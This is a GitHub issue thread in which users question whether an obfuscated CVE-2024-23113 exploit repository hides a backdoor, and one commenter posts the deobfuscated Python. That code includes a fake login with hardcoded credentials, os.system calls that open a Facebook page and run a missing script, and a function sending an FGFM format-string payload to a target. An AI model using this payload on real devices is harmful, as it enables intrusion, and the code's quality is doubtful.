search

OxLmahdi / cve-2024-23113

MIT License
0 stars 0 forks source link

issue #1

Open stickybit001 opened 1 month ago

stickybit001 commented 1 month ago

Is this exploit is working ? Did you obsfuscated the source code ?

opstoken commented 1 month ago

it seems a backdoor

stickybit001 commented 1 month ago

yes same I didn't trust how the code is obfuscated!! could you find the poc somewhere, it was publicly available , shall we report to github..?? @opstoken

OxLmahdi commented 1 month ago

There is no backdoor..If in doubt then you can check on vmware

sec13b commented 1 month ago

simple , upload the correct python script , and we can check is or not with backdoor.

OxLmahdi commented 1 month ago

Am I use obfuscated to give the script..simple bypass obsfuscated and check bye

cryzetho commented 3 weeks ago

Surprisingly, it turned out to be a legitimate script and not a backdoor after deobfuscating it. Here's the original python code:

import socket
import sys
import os
import time
import random
import string
import requests
from requests.structures import CaseInsensitiveDict

def Axak(xak):
    for x in xak:
        sys.stdout.write(x)
        sys.stdout.flush()

def xak(xak):
    xak = xak + '\n'
    for x in xak:
        sys.stdout.write(x)
        sys.stdout.flush()
        time.sleep(0.04)

def xak2(xak):
    xak = xak + '\n'
    for x in xak:
        sys.stdout.write(x)
        sys.stdout.flush()
        time.sleep(0.07)

logo = '''   


 ██████╗ ██╗  ██╗██╗     ███╗   ███╗ █████╗ ██╗  ██╗██████╗ ██╗
██╔═══██╗╚██╗██╔╝██║     ████╗ ████║██╔══██╗██║  ██║██╔══██╗██║
██║   ██║ ╚███╔╝ ██║     ██╔████╔██║███████║███████║██║  ██║██║
██║   ██║ ██╔██╗ ██║     ██║╚██╔╝██║██╔══██║██╔══██║██║  ██║██║
╚██████╔╝██╔╝ ██╗███████╗██║ ╚═╝ ██║██║  ██║██║  ██║██████╔╝██║
 ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═════╝ ╚═╝

              WELCOME CVE-2024-23113            

[-] AUTHOR    : Mahdi Hasan
[-] GITHUB    : oxLmahdi

'''

r = '\x1b[1;31m'
g = '\x1b[1;32m'
y = '\x1b[1;33m'
b = '\x1b[1;34m'
p = '\x1b[1;35m'
c = '\x1b[1;36m'
w = '\x1b[1;37m'

print(logo)

user = str(input('\n' + g + 'USERNAME FOR  (INBOX-ME) \n \n' + w + 'USERNAME ' + r + '=>' + y + ' '))
pas = str(input('\n' + g + 'PASSWORD FOR (INBOX ME) \n \n' + w + 'PASSWORD ' + r + '=>' + y + ' '))

if user == 'mahdi' and pas == '1234':
    Axak(g + '\n\n\t\t      LOGIN SUCCESSFUL \x1aJOIN MY FACEBOOK GROUP ')
    os.system('xdg-open https://www.facebook.com/profile.php?id=61559826326987')
else:
    Axak(y + '\n\n\t\t      Invalid User Or Pass')
    Axak(y + '\n\n\t\tContract Admin For User And Pass')
    os.system('xdg-open https://www.facebook.com/profile.php?id=61559826326987')
    os.system('python S-BOOMB.py')

def create_payload():
    return b'FGFM %p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-'

def exploit(ip, port):
    try:
        print(f'[*] Starting exploit attempt on {ip}:{port}...')
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print(f'[*] Attempting to connect to {ip}:{port}...')
        s.connect((ip, port))
        print(f'[*] Successfully connected to {ip}:{port}.')
        payload = create_payload()
        print(f'[*] Sending payload: {payload.decode()}...')
        s.send(payload)
        print(f'[*] Response from target:\n{s.recv(4096).decode(errors="ignore")}')
        s.close()
        print('[*] Connection closed.')
    except socket.error as err:
        print(f'[!] Socket error: {err}')
        sys.exit(1)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f'Usage: {sys.argv[0]} <target_ip> <target_port>')
        sys.exit(1)
    exploit(sys.argv[1], int(sys.argv[2]))

The corresponding deobfuscated bytecode is attached as a text file. bytecode.txt

I can also share a script that outputs the attached bytecode for further proof, or if any of you want to try it out yourself.

Still, very weird on why you would even obfuscate this in the first place if there's nothing to hide. I can only assume because it's a CVE, but usually this is not a problem on GitHub. I mean yeah, it does execute os.system(), but it just opens his Facebook page and the S-BOOMB.py doesn't exist and is also never created at any point in time.

Thank you for this challenge mahdi, was fun to reverse.

OxLmahdi commented 3 weeks ago

I'm obfuscated because I'm learning obfuscated.If I share the original source code.nevertheless Some people will say I'm a backdoor..thank you prove this not a backdoor ..If you don't have any problem, I can add with you on facebook

sec13b commented 3 weeks ago

@OxLmahdi all cve on your account , its same like this.

cryzetho commented 3 weeks ago

I'm obfuscated because I'm learning obfuscated.If I share the original source code.nevertheless Some people will say I'm a backdoor..thank you prove this not a backdoor ..If you don't have any problem, I can add with you on facebook

Sadly, I'm not using Facebook at all, however, I would be interested in the script you used to obfuscate the .py.

sec13b commented 3 weeks ago

cve garbage